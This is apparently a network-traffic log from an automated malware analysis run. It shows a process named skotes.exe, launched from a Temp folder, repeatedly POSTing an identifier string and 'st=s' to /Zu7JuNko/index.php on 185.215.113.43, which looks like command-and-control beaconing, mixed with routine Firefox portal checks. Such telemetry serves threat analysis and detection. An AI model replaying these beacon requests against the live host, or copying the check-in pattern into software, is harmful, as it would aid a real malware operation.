Dec 14, 2024 13:01:43.521367073 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:01:43.643596888 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:43.961499929 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77356 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:01:44.600013018 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:44.914681911 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77357 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:01:46.020365000 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:46.336832047 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77359 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:01:54.640043020 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:01:54.971488953 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77367 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:02:05.023569107 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:15.218542099 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:15.355117083 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:02:15.670268059 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77388 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:02:25.716376066 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:35.924552917 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:36.303369999 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:02:36.618206024 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77409 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:02:46.716283083 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:02:56.923260927 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:03:07.130728006 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:03:17.318463087 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 14, 2024 13:03:57.999677896 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 13:03:58.314210892 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77491 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 14, 2024 13:04:16.832252026 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50329	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:18.608393908 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:19.947981119 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50331	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:21.683419943 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:23.014326096 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50332	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:24.657737970 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:26.013088942 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50333	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:27.751075983 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:29.092339993 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	50334	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:30.726732016 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:32.183727026 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	50336	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:33.919629097 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:35.261835098 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	50337	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:36.893863916 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:38.249176979 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	50338	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:39.989351988 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:41.321482897 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	50340	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:42.962074041 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:44.299663067 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	50350	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:46.038290977 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:47.381658077 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	50351	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:49.011529922 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:50.349304914 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	50352	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:52.086276054 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:53.433979988 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	50354	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:55.083463907 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:01:56.633671045 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	50355	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:01:58.375993013 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:01:59.724138021 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:01:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	50356	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:01.356940985 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:02:02.708919048 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	50357	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:04.444016933 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:02:05.800153017 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	50358	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:07.437787056 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:02:08.775969028 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.4	50359	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:02:10.514288902 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:02:11.846957922 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.4	50360	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
